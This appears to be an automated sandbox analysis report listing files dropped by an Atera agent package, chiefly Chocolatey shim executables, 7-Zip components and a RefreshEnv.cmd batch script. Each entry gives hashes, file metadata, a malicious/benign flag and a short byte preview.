                                                                                                                                                                                                                                        SSDEEP:48:WJhzy3v9zec4JksG5A10JZ65RhS9JlqUp7B9nplD6e7B5yg:42V6Q5A1B5C9L/
                                                                                                                                                                                                                                        MD5:B4326546C3A252494DCD512976F8B89A
                                                                                                                                                                                                                                        SHA1:09D10EA0ABDBDE8C2B5BAFE410ED3B96AB0076C8
                                                                                                                                                                                                                                        SHA-256:9B251737A6B6ACE9FDE45B64FD653B04575C6416F15112FBE1697A47B14990E6
                                                                                                                                                                                                                                        SHA-512:E58EDC6DC66A289358E7FDE7C3F1D73A0EE1F7A6DB382DD1318FAA205E12271C081617B8366ECD1FCB3A0BC5A98F4B0F0C389C99A63D9EDF7CE1BD230AC85EC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@echo off..::..:: RefreshEnv.cmd..::..:: Batch file to read environment variables from registry and..:: set session variables to these values...::..:: With this batch file, there should be no need to reload command..:: environment every time you want environment changes to propagate....::echo "RefreshEnv.cmd only works from cmd.exe, please install the Chocolatey Profile to take advantage of refreshenv from PowerShell"..echo | set /p dummy="Refreshing environment variables from registry for cmd.exe. Please wait..."....goto main....:: Set one environment variable from registry key..:SetFromReg.. "%WinDir%\System32\Reg" QUERY "%~1" /v "%~2" > "%TEMP%\_envset.tmp" 2>NUL.. for /f "usebackq skip=2 tokens=2,*" %%A IN ("%TEMP%\_envset.tmp") do (.. echo/set "%~3=%%B".. ).. goto :EOF....:: Get a list of environment variables from registry..:GetRegEnv.. "%WinDir%\System32\Reg" QUERY "%~1" > "%TEMP%\_envget.tmp".. for /f "usebackq skip=2" %%A IN ("%TEMP%\_envget.tmp") do (

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):136704
                                                                                                                                                                                                                                        Entropy (8bit):5.174853806484254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ED98HpKI6GCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:Y9GpKbShcHUa
                                                                                                                                                                                                                                        MD5:DDD072DBD2267BCB3081340E57ED092B
                                                                                                                                                                                                                                        SHA1:04EC398A1DE53DC960A882363A528E162350C57C
                                                                                                                                                                                                                                        SHA-256:460F604144DD93A3794F75C9E09B2676D7AD1295CD92499FAD80ED3C27990F02
                                                                                                                                                                                                                                        SHA-512:2271C5846254EAA7389D23EE0241814D06D34257A7B6D44FE7CBEA14F3ACA5101457FAD934B22D2B9B49F1263BCB4209D8EADC07DB93E2B5E01CCDA5BD6ED2A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)$/b.................D...........c... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....C... ...D.................. ..`.rsrc...X............F..............@..@.reloc.......`......................@..B.................c......H....... ...x5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162895637606263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:KMU90HpKOrGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:K59OpKgShcHUa
                                                                                                                                                                                                                                        MD5:0BCC21AC34291B167EC4D73079EAE085
                                                                                                                                                                                                                                        SHA1:BAEF2A7349E2C6269BBF2C8C6654C492683FC73E
                                                                                                                                                                                                                                        SHA-256:14288199533B10CAD97F5917447979BBC4685F20255AA073EC1BB828D3CF6A2C
                                                                                                                                                                                                                                        SHA-512:9B7CC423E4F27DFF6006425311A6CC39CBA9CB5D3D4966C81FDA21C5907A434B6A748A92B65229A01A65440D8BA2D87D9E8C99CE80E2062569232A10AE74F9BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*$/b.................F...........c... ........@.. ....................................@..................................c..W.......p....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...p............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162623164553414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1w9mHpKZNGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:C9UpK7ShcHUa
                                                                                                                                                                                                                                        MD5:55CC3EA23C5430BE7B5A75A52157DA18
                                                                                                                                                                                                                                        SHA1:AB1D482F2B5E7E0DAD31EA18B78D5F8EA849B87D
                                                                                                                                                                                                                                        SHA-256:BE0494DC91E38456E22692F3AB1891C56871FB82A83ADFDC58F8F890141ECEC9
                                                                                                                                                                                                                                        SHA-512:C09E0476E2D1F69A878195A4026954C5D74C0B5318254A60ABC5909F00A60CCE86D49D29BBF1ECAE498BCE0C2FD2551EFEF0FE287DAB7EAD2FE573CCC833CF3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+$/b.................F...........d... ........@.. ....................................@..................................c..S.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162059784215363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:YE9tHpKrvGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:795pK7ShcHUa
                                                                                                                                                                                                                                        MD5:4E2DC776C653ADBEBCF5DB16AB53296E
                                                                                                                                                                                                                                        SHA1:290457CFC7EC45A493CCEACD2CA24A47237494C1
                                                                                                                                                                                                                                        SHA-256:2DCB2236BB84AE42F4395E72EC67A22CBE0E68ADA4F80FABD7141B5B3D4E7985
                                                                                                                                                                                                                                        SHA-512:533B424AFD7E5BF831BB72164D91B663A2368D458A3EFFFF7062A15D1AB77585C087FA5A5471D3530CCF30309AC30C35EAA4A9168A350071A64E912E15012311
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\clist.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162082250130723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:GI9KHpKHDGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:l9QpKjShcHUa
                                                                                                                                                                                                                                        MD5:76385C4CF0842546103EDD75662BDAD7
                                                                                                                                                                                                                                        SHA1:BC42B5817E6BB3568CC6D7C0BD2B03E8B723024B
                                                                                                                                                                                                                                        SHA-256:67EB4084D0BD361C42FFD7AF025167BAFCE8496A35CA6616945E0942386C6424
                                                                                                                                                                                                                                        SHA-512:BAB9B5AE9B89697A7FA83D0D29A4DB0B777F126EEC8DF3BAE9B009AF9A0D556BB79BF2DCED1D26C7A8E900AC5AA7DDE07CEC334DA6418925F352554383F77EC2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$/b.................F...........c... ........@.. ....................................@..................................c..O.......X....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...X............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.163276282537277
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:pS791HpKIqGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:pO9xpKbShcHUa
                                                                                                                                                                                                                                        MD5:5C9628C46256D0F6B14DE2168CBED8CC
                                                                                                                                                                                                                                        SHA1:B7284385B0076623B76EC3FB2398B5EE8F3B9F85
                                                                                                                                                                                                                                        SHA-256:354C3758A1F9E5A39E7292E9CCA353F815358977B3CC9A704BCEAB257AC6C24C
                                                                                                                                                                                                                                        SHA-512:84886CF1632EFA70D8023F99A663E809422DFCC1C566793EF52078551DA105BFF1B2F9D54E197D8CCE53C3C725226635D623D9D539B5BFD4C17C802286EFADB4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../$/b.................F...........d... ........@.. ....................................@..................................c..W.......`....................`....................................................... ............... ..H............text...$D... ...F.................. ..`.rsrc...`............H..............@..@.reloc.......`......................@..B.................d......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162239721051707
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:TR9vHpKmEGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:F9/pKvShcHUa
                                                                                                                                                                                                                                        MD5:8783ED37D6871AE20E4A65A655788A7E
                                                                                                                                                                                                                                        SHA1:C42F5B032CF27FFC36869C22D5BE0363AC2E5AF4
                                                                                                                                                                                                                                        SHA-256:5AFEF49A1BB85ED16EE7EF08D9ED694F166A9500701728770E50E92978566C5B
                                                                                                                                                                                                                                        SHA-512:1FE424147DBAD7978F0C856D152F3236685C52DBCA5DD6AB7A03E5D1B8A08566FDF4574C4704FBEDF286A4C13B354D771E25D1B725D55578C14E9EAB2D8F9898
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0$/b.................F...........d... ........@.. ....................................@..................................c..W.......P....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...P............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe.ignore

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1167872
                                                                                                                                                                                                                                        Entropy (8bit):6.603432444128302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Gxb5vMX35l5UVrIdhcMEKWnttf7eePboHvVxSfOtl:GxbSz5UVrIdhnW1Pc96Otl
                                                                                                                                                                                                                                        MD5:0DCE103B0102ADEC3279797665B7A4AE
                                                                                                                                                                                                                                        SHA1:C121392BAB6DBA8D04BEE89C6B526E8E67650CC8
                                                                                                                                                                                                                                        SHA-256:3DB62076E5FCC897FF29DA47FE4029900A4AD696B395B6FA96ACFF1229444C1D
                                                                                                                                                                                                                                        SHA-512:20F0F02097694579AC8794D56411FBE2D97C47D37794CB52AFDABC9956C0452E8A3BB273ED34E463F31927E29E7E41C0FDDB82FBBE688DD39C4113C00EC91BC9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(x.(x.(x.Gg.+x..d.!x.Gg.,x.Gg.*x..p..)x.(x.@x..p../x..^..x..^.*x.3.z..x....-x..~.)x..X.)x.Rich(x.........PE..L...`u.a...........!.........~.......>....................................................@.............................y.......d........{......................P.......................................................D............................text............................... ..`.rdata..............................@..@.data...............................@....sxdata......p......................@....rsrc....{.......|..................@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll.manifest

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe

                                                                                                                                                                                                                                        Download File
